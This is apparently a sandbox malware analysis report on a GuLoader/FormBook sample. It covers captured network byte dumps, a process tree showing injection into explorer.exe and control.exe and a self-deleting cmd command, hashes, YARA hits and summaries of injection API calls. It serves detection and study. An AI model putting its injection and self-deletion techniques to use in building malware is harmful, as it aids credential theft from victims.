96 7a 21 73 84 e4 fa ab 1e 4c 1e d5 34 58 1d 1a 7e 5b fe 42 2a 39 a3 22 d6 44 35 98 a3 ca 5a f4 24 0b 9d 27 f5 7d 71 51 c2 ad 6e 3f fc ab 81 89 26 a8 9d bd 29 74 37 71 1e 79 d1 9b 0b 50 12 2b 95 5f 2e 20 75 87 82 cb 9e f4 52 09 dc 87 31 3d 01 01 27 b8 49 e3 b7 29 62 45 59 33 5a af 38 cc 88 ce 62 bb b2 a0 95 eb 1f 7c 05 c0 b1 69 6a 50 f7 85 f9 66 2d f5 8a f7 30 fd 4e c3 b4 09 1f 05 a1 53 bc 80 07 7d ed 06 9b ac a3 17 92 c4 55 24 22 94 68 9f 98 89 36 a5 ee 94 14 fc be f2 6e 78 9b 33 71 d1 02 5f 82 93 6f 95 2e 74 32 22 88 a3 61 41 c1 ac e3 46 60 f9 fd 35 dc ce c2 5c 62 dd 0f 34 46 f9 88 8f 77 34 72 b5 48 8d 02 90 c4 0c 49 59 c9 ef 44 32 35 94 0c 42 3f 61 b9 c6 81 6e 86 d8 67 39 8d 2b 60 e2 42 f7 f3 72 00 c0 9c 67 6b 06 0b ba de 33 d6 a1 81 48 4e 39 b0 3d 51 b2 fc d5 df 31 06 86 50 f3 5e 28 31 23 bf fa 8e b8 ba 09 00 cc 16 4c c5 81 7b 7c 52 49 69 bc 25 bd ac 8b 72 29 c8 65 75 ce 77 03 ab 35 6f 95 f8 68 21 e8 de 4c 4d a1 15 dc 53 08 63 94 7a c9 8b 89 43 12 0b ac cd 1b fb 60 08 7a 88 a6 2d 54 29 b7 7d f0 82 Data Ascii: RUzjQ:r><6v/F(Qi7g[ &'y-+$0mf-t7#P}UdM3U$"h6nx3q_o-.t2,oAu.g5F)&mn,y\,p2j4`BrXp?qIhH`N<6rt1^EU!%r)50wO4oOfLMSc{C{`z-}l]Y:4{fqOrsNUj}.DvY[,&gJ$'S`fEDLJ\|3;]`&#fX/~>1si$3S.kUfQ""^42AA-Hi8er:cY\|hISSX&b?>~`1h#?1&h3R!lq::BDJ^{3iVB@myemsHucjQL?TeQ3PE=Oq'4\|d}3 Ev1W#O='w+N t`FP{C8]CWrbC!"b}j]C,a.kVz!sL4X~[B*9"D5Z$'}qQn?&)t7qyP+_. uR1='I)bEY3Z8b\|ijPf-0NS}U$"h6nx3q_o.t2"aAF`5\b4Fw4rHIYD25B?ang9+`Brgk3HN9=Q1P^(1#L{\|RIi%r)euw5oh!LMSczC`z-T)}
May 11, 2021 20:43:41.397047997 CEST	4940	IN	Data Raw: 6c f6 b3 dd e6 82 e8 dd b4 ea 59 2a cc 34 d4 79 f5 66 df b0 80 e4 71 a1 02 0d 4a 72 b6 73 e6 e3 91 80 cc 9a de 4e f8 57 99 6a 7d 2e 1a cf c7 44 36 d8 e1 aa 9e ca 5b 94 d2 2c 26 67 5a 93 ad d3 bd d6 ca 19 97 24 37 fb dc 53 60 c7 1d 66 b8 45 9f 44 Data Ascii: lY4yfqJrsNWj}.D6[,&gZ$7S`fEDLJ\|3;]`&#fX/~>1si$3S.kUfQ""^42AA-Hi8er:cY\|hISSXF=>~b1h#?1&+hS
May 11, 2021 20:43:41.397064924 CEST	4942	IN	Data Raw: 09 dc 87 31 3d 01 01 27 b8 49 e3 b7 29 62 45 59 33 5a af 38 cc 88 ce 62 bb b2 a0 95 eb 1f 7c 05 c0 b1 69 6a 50 f7 85 f9 66 2d f5 8a f7 30 fd 4e c3 b4 09 1f 05 a1 53 bc 80 07 7d ed 06 9b ac a3 17 92 c4 55 24 22 94 68 9f 98 89 36 a5 ee 94 14 fc be Data Ascii: 1='I)bEY3Z8b\|ijPf-0NS}U$"h6nx3q_o.t2"aAF`5\b4Fw4rHIYD25B?ang9+`Brgk3HN9=Q1P^(1#L{\|RIi%r)euw5oh!LMScz
May 11, 2021 20:43:41.397084951 CEST	4943	IN	Data Raw: ac 42 40 6d fc 79 90 7f f9 65 6d 73 a8 9a c9 48 75 00 e6 db c0 63 0b 6a 87 51 4c eb 3f 91 8d f8 1a f8 54 fa fe a9 cb 81 95 65 f5 0c c5 c8 51 0d e5 02 33 88 ad 16 50 45 d9 7f 02 3d 08 93 c1 bc 4f 71 8c 27 bb 34 7c 64 1a 8b bc 7d de e5 dc 8c 33 fa Data Ascii: B@myemsHucjQL?TeQ3PE=Oq'4\|d}3 Ev1W#O='w+N t`FP{C8]CWrbC!"b}j]C,a.kVz!sL4X~[B*9"D5Z$'}qQn?&)t
May 11, 2021 20:43:41.397100925 CEST	4945	IN	Data Raw: 69 9f 3a 33 79 cc f1 a0 9f 57 fd 7a 6c 34 5a 77 87 c1 3f a6 58 29 e0 dc 94 47 6b aa 61 73 1a 95 e7 28 f2 48 44 92 4c bb 9d 0d fa cf 98 b3 bd f0 2c 26 e4 9e 83 9e 13 38 20 be 08 bc fb bd b7 d9 8f 52 c8 5d ee b4 7e d8 7f 8a a6 bb 22 6c 9d 18 01 a0 Data Ascii: i:3yWzl4Zw?X)Gkas(HDL,&8 R]~"l[gs9ivZWn3RxS%>}je-\tTiN,K{7eA]#\|< U~:c~+QzLUm9$P84vu1
May 11, 2021 20:43:41.397118092 CEST	4946	IN	Data Raw: 8e 66 6f d2 9d ba c2 b3 da b4 ff 49 54 35 9d 44 8f 42 77 34 d8 f9 e5 3b 4e 96 4c bb 1c 48 3e e3 c9 0e 75 08 59 da 69 8d 73 8c f7 fe 5e ac 71 32 b5 02 2a 83 77 57 5c e8 0d b1 20 ce e5 11 98 64 67 76 2d ac e7 86 d3 79 4a 09 91 87 05 b0 f2 cc c5 da Data Ascii: foIT5DBw4;NLH>uYis^q2*wW\ dgv-yJzhjZXzO&>S\z:2=O\|s&Q'Bf!5A]wrS4<c&=0]~/f7) 5@[I2:~E9ASt;K[T\|{m^N5tv+
May 11, 2021 20:43:41.397135019 CEST	4947	IN	Data Raw: 6d 7d b4 2d 6a 34 b7 8a d5 5c 61 af a4 8e 9e 7a ae b3 63 47 e9 7d 3f 9f 00 a9 05 01 c6 ee a4 df a2 70 f0 38 37 ae 7f cb 2c 6f 4f 28 16 ae ba 26 5b 1e 21 30 54 44 b8 b1 8e 73 d6 1d 92 2b a3 9f 83 42 82 21 22 68 38 40 3d 6a 2c bb 50 3f 27 13 48 9c Data Ascii: m}-j4\azcG}?p87,oO(&[!0TDs+B!"h8@=j,P?'H"BlG8)7P2$Ityb}l4]k#t%]?E^_];T!T$Ldg{dtRU~v'^kJ{L
May 11, 2021 20:43:41.397154093 CEST	4949	IN	Data Raw: 0a 0e 85 e2 b6 24 0a f5 b5 8d a9 11 d2 32 56 05 c0 62 21 b1 72 a9 3f ae ba ab 0a 37 38 bb ab 8b cf 9e 59 4f 4f 6c 2d d3 86 32 a9 31 6a 56 a5 2e 35 e6 a5 c5 bd fe 1b d6 7c 3f e2 99 cd ae 69 e0 8b 51 6a 84 cc 39 aa 08 7e d3 fc d8 d9 2d f3 fc 32 8f Data Ascii: $2Vb!r?78YOOl-21jV.5\|?iQj9~-2fR^`Rc\`eZmhL1=TZb!^bu=RX#\|8pzly5k{K=j>WUNYc:pm*\z4KAUQ&P+
May 11, 2021 20:43:41.397172928 CEST	4950	IN	Data Raw: 50 c7 d9 50 69 51 7c 37 80 6f 14 e0 36 9d c4 40 ae ef 74 0d 7a 06 91 f7 19 cb 30 b5 d5 b4 3c 4b 07 4f c8 de 94 39 ac fd 82 12 29 6d 3d b4 d0 17 f4 af db dd 19 be d2 ee 4e b3 91 14 6b eb b1 0e 1d 2d bf 1e 0b 8b 2e fd 0b cf 39 a3 52 ab 48 c8 dd 77 Data Ascii: PPiQ\|7o6@tz0<KO9)m=Nk-.9RHw\|e%kfi\;r( L]'y<{yg/5L^E!@&{eJ$r,D=@WFsELE20dfvhNjS2Q>
May 11, 2021 20:43:41.397190094 CEST	4951	IN	Data Raw: 29 d3 41 84 0b 95 87 ae 8d 2d 37 10 6b 07 1a 07 54 f1 00 20 b1 89 1e 14 f9 81 87 cc da f3 24 cd 3b 09 4a 16 af 45 26 be c4 35 89 75 3e bc b0 71 87 d9 32 4e 70 ef 6b 9b 37 83 1f 2a d4 0d d4 fa 10 20 ba 6e 06 7e 54 68 f4 31 58 dc b7 a9 aa 35 e4 24 Data Ascii: )A-7kT $;JE&5u>q2Npk7* n~Th1X5$PhJoOyC9/K]b)/[+%c{tCajwug kD-C'+DzA5}qQI;}JWw3dP*4
May 11, 2021 20:43:41.614077091 CEST	4960	IN	Data Raw: 72 b6 f8 92 53 95 41 02 8a 1f 85 f0 64 6a e1 20 de 9b 2c 38 44 36 d8 6a f6 06 ce 9a 57 da 1f d5 ec 07 6f 6c 28 a5 57 29 e6 97 24 37 c8 a8 cb 64 4c 40 96 8b 34 8b cd 31 2c 8b 83 23 47 74 1b fd d8 3b d6 81 6d 08 c2 63 68 5b e9 2b e7 70 10 ad f4 58 Data Ascii: rSAdj ,8D6jWol(W)$7dL@41,#Gt;mch[+pX"IXL$l&Fw)fQ"m.F`;ZIsj=-5<x,BHu5?:v]%`?eBsUc1[;~4`.(DZPJb"Q3i

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: POLITICALLY.exe PID: 7124 Parent PID: 6140

General

Start time:	20:42:20
Start date:	11/05/2021
Path:	C:\Users\user\Desktop\POLITICALLY.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase:	0x400000
File size:	225280 bytes
MD5 hash:	80B3365808440838596864BD6D492C02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: POLITICALLY.exe PID: 6976 Parent PID: 7124

General

Start time:	20:43:02
Start date:	11/05/2021
Path:	C:\Users\user\Desktop\POLITICALLY.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase:	0x400000
File size:	225280 bytes
MD5 hash:	80B3365808440838596864BD6D492C02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 6976

General

Start time:	20:43:45
Start date:	11/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 5548 Parent PID: 3440

General

Start time:	20:44:00
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0x330000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6028 Parent PID: 5548

General

Start time:	20:44:04
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6776 Parent PID: 6028

General

Start time:	20:44:04
Start date:	11/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: POLITICALLY.exe PID: 7124 Parent PID: 6140 POLITICALLY.exeCOMMON

Executed Functions

Function 02213269, Relevance: 3.5, APIs: 2, Instructions: 483libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0221DC36: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 6fb61d1dfc92234b7693fef308363e652e34b35b7f10fb2262a10d742629658e
Instruction ID: a86747634c1765b78f5c042f58c115adf7b69dd843280eb2359914e644757fe8
Opcode Fuzzy Hash: 6fb61d1dfc92234b7693fef308363e652e34b35b7f10fb2262a10d742629658e
Instruction Fuzzy Hash: A4E101B11343926FCF312AB08C48BFD3B96CF91B14F5845A9E8D64F59CC7A6818AC711

Uniqueness

Uniqueness Score: -1.00%

Function 02212B60, Relevance: 1.9, APIs: 1, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: f93ddac4e422fba18a2479424a3ab7f42b34baf22365945a49d798f260c96c0f
Instruction ID: 1c4652998e95fc04b39765783e185d59fb4bd534f30e1b14bd36e691ba05e65d
Opcode Fuzzy Hash: f93ddac4e422fba18a2479424a3ab7f42b34baf22365945a49d798f260c96c0f
Instruction Fuzzy Hash: F8D16EF12742465FDF220E70CC5ABF97BA9EB55B04F084158E5C10F598C7F6628AC794

Uniqueness

Uniqueness Score: -1.00%

Function 0221AE76, Relevance: 1.8, APIs: 1, Instructions: 338nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 61f1c21ae7f9dfab9245a832d898bcb6269ab0d3b9b1e210c66bf659126756f2
Instruction ID: 45cdbd0f8afb25097183172077a001095166ab60d948de8b2c151708a4738267
Opcode Fuzzy Hash: 61f1c21ae7f9dfab9245a832d898bcb6269ab0d3b9b1e210c66bf659126756f2
Instruction Fuzzy Hash: ABB17EF12742466FDF120E70CC5ABFD7BA8EB91B04F089158E6C11F594C3F6A28A8794

Uniqueness

Uniqueness Score: -1.00%

Function 0221DB19, Relevance: 1.8, APIs: 1, Instructions: 334memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: fcc32064a41276f496af478619096d0e8074317a4298d4450c713b2deb19d8f7
Instruction ID: ae39b8b6112a7332f591d1da7d481bba8ffa393071e8c2ba9efa91c5ead43df9
Opcode Fuzzy Hash: fcc32064a41276f496af478619096d0e8074317a4298d4450c713b2deb19d8f7
Instruction Fuzzy Hash: B2A19BF21780D60E8F430A306C6E1F9BF9CCBD6D16B0CA9D885E10F915D696639F83A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221DD81, Relevance: 1.8, APIs: 1, Instructions: 324memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 5c9fcd458a8fb2659697287b66e794606a43b7fde7252e04e57c9765a39a77df
Instruction ID: 5b636db310062cc2d2b6bbff75f66f1049f7cc84cbe198e99346ef0750de177b
Opcode Fuzzy Hash: 5c9fcd458a8fb2659697287b66e794606a43b7fde7252e04e57c9765a39a77df
Instruction Fuzzy Hash: 88917CE21780D60E8F430A306C6E1F9BF9CCBD6D1674CA9D8C5E10FA15D686639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221AFD8, Relevance: 1.8, APIs: 1, Instructions: 319nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: d6238f1455436a52931531edc98155ab20b1454ab04b3a2c69aa8dbd1c9af314
Instruction ID: ab66417a598981cdd7b861f1eb918555da307316b0081a94cf3f90399f862c2c
Opcode Fuzzy Hash: d6238f1455436a52931531edc98155ab20b1454ab04b3a2c69aa8dbd1c9af314
Instruction Fuzzy Hash: F4A16AF12742865FDF120E70DC5ABF97FA8EB95B04F089168E5C10F594C3F6A28A8794

Uniqueness

Uniqueness Score: -1.00%

Function 0221DFD8, Relevance: 1.8, APIs: 1, Instructions: 316memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: ea30a8b07d2b7a08bf0e15ad7aadfe25f9840a9cfe1d0737a4a6c5b992af3abf
Instruction ID: aec420f051a6e351af37eefa801d5bbe5100fd920fc4f3f1ad801b82b780d5af
Opcode Fuzzy Hash: ea30a8b07d2b7a08bf0e15ad7aadfe25f9840a9cfe1d0737a4a6c5b992af3abf
Instruction Fuzzy Hash: 2C9159F21780D60E8F470A306C6E1F9BF9CCBD6D1674CA9D881E10F915D686639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221B121, Relevance: 1.8, APIs: 1, Instructions: 304nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 2a2652518fc52dc7a7235b35061653705c67e36350d22cee46a98717d5e40312
Instruction ID: 4a3128355d13cf9b8b47629a10a117a2a8127d87e26d55a0fe741e524703c3ad
Opcode Fuzzy Hash: 2a2652518fc52dc7a7235b35061653705c67e36350d22cee46a98717d5e40312
Instruction Fuzzy Hash: 01A16AF12742865FDF120E70DC5ABF97BA8EB95B04F089168E5C10F594C3F6A28A8794

Uniqueness

Uniqueness Score: -1.00%

Function 0221B24A, Relevance: 1.8, APIs: 1, Instructions: 302nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b4f4b7bef5de6548a899d3cbecf7d1f1b5c5415f34c54f918f285f41c226b28f
Instruction ID: 950627ffcef8af77eb95ca3b7a92013fb6482b184be3f2ddb0f796b6a016c140
Opcode Fuzzy Hash: b4f4b7bef5de6548a899d3cbecf7d1f1b5c5415f34c54f918f285f41c226b28f
Instruction Fuzzy Hash: F6A178F12742865EDF120E30DC5ABF97BA8EB91B04F089168E5C10F554C3EAA2CE8794

Uniqueness

Uniqueness Score: -1.00%

Function 0222EF21, Relevance: 1.8, APIs: 1, Instructions: 298nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: d79d04ab85d6d7e1521aee6fc555c044816a5b789099fa40f757fab327252eb0
Instruction ID: 49d60d41dc1ecd2c816b8c20f95ca22bfa1467a781f67a65d3ad56f2e1ed1310
Opcode Fuzzy Hash: d79d04ab85d6d7e1521aee6fc555c044816a5b789099fa40f757fab327252eb0
Instruction Fuzzy Hash: 889139A21780D60DCF470930A86E2F9BF6CCBD6C16B4CA9D8C1E10F915D796639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221B3D0, Relevance: 1.8, APIs: 1, Instructions: 274nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ad5f9838de7815b08beb494d66b13f28f1601b0bfc4acc4f3a731e54a19c9e6d
Instruction ID: 6e69df58bce9d5c83d5c17362c04bee51e4731d74b04fc904b621e832701ed77
Opcode Fuzzy Hash: ad5f9838de7815b08beb494d66b13f28f1601b0bfc4acc4f3a731e54a19c9e6d
Instruction Fuzzy Hash: C49174F11742865FDF120E30DC5ABF87BA8EB95B04F089468E5D10F594C3E6A2CA8794

Uniqueness

Uniqueness Score: -1.00%

Function 0221B514, Relevance: 1.8, APIs: 1, Instructions: 271nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: f52800504922b588e36a04af6baeb8ba7a4dff41361a3033523f32103b961dae
Instruction ID: 5c5b3a5b3f303dc034c39ffaa0e98f0111bc0c885bdaffcc9b39f7276b263608
Opcode Fuzzy Hash: f52800504922b588e36a04af6baeb8ba7a4dff41361a3033523f32103b961dae
Instruction Fuzzy Hash: 108158F11782C51EDF130A309C5ABF87F68DB96B04F089498E5C10F495C3E666CE9794

Uniqueness

Uniqueness Score: -1.00%

Function 0221CEAB, Relevance: 1.7, APIs: 1, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateCreateFileMemoryVirtual
String ID:
API String ID: 2773895085-0
Opcode ID: 4edcf7461a53e4759045ef0b9728f0d80f7b05cfb72cc75acd4dfab9576e1878
Instruction ID: 82ea7c877a98aac82950287bf7738129c864d5f96acad0c29c8199cc265577e1
Opcode Fuzzy Hash: 4edcf7461a53e4759045ef0b9728f0d80f7b05cfb72cc75acd4dfab9576e1878
Instruction Fuzzy Hash: DE8105B4260305BFEB205F94CC46FF936A6FF15704F104125FA856A1D8C7F9A889CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0221AE71, Relevance: 1.7, APIs: 1, Instructions: 244nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: adf081e388e2cf9a63a424c2170712c7b5c970abea9e62f499a49bee117f0376
Instruction ID: 56fa80e483a9b2fbdcaff9ffbd6458ecd8c592b779c580e02b0a71fdb0608453
Opcode Fuzzy Hash: adf081e388e2cf9a63a424c2170712c7b5c970abea9e62f499a49bee117f0376
Instruction Fuzzy Hash: 4B91E1B4260309BFEB215F90CC46FE936A2FF14704F104125FA856A1D8C3FAA995DF49

Uniqueness

Uniqueness Score: -1.00%

Function 0221B698, Relevance: 1.7, APIs: 1, Instructions: 231nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ba3e8f613edf4c2c6b437e7afbf3eb999f48e895efb7f0bf9157cc1f7ab27482
Instruction ID: 01517a4a4d4b4792af4fae8ac610a0e2172465c15b9e745dcdcbe25be9f2ec1a
Opcode Fuzzy Hash: ba3e8f613edf4c2c6b437e7afbf3eb999f48e895efb7f0bf9157cc1f7ab27482
Instruction Fuzzy Hash: 9F7145F11781861EDF130A30DC9A7F87FA8DB95B05F089498E5D10F558C3E6A2CE9794

Uniqueness

Uniqueness Score: -1.00%

Function 0222EDB9, Relevance: 1.7, APIs: 1, Instructions: 217nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: ee1f1e7bc003b954fe03a0cb3e5a33f2dd331da508f055488a21f845305eaf9b
